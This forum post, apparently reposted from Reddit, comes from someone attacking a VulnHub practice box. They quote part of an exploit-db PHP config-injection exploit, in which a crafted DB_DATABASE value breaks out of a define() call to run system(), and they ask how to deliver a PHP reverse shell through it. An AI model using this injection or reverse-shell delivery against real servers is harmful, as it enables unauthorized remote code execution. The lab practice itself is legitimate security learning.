I'm trying to use [this exploit](https://www.exploit-db.com/exploits/44374) on a box from vulnhub, but the part I can't figure out is in the exploit where it says:
#the payload will be injected into the configuration file via this code
#' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
#so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += 'system("ls");' # this is where you enter you PHP payload
payload += '/*'
data['DB_DATABASE'] = payload
So how do I actually enter the PHP payload? I'm trying to use the PHP reverse shell from Pentest Monkey that comes with Kali. I tried copy pasting and
payload += 'system("php /path/to/php_reverse_shell.php");'
Thanks guys.
[link] [comments]
from hacking: security in practice https://ift.tt/rPl1EfU
Comments
Post a Comment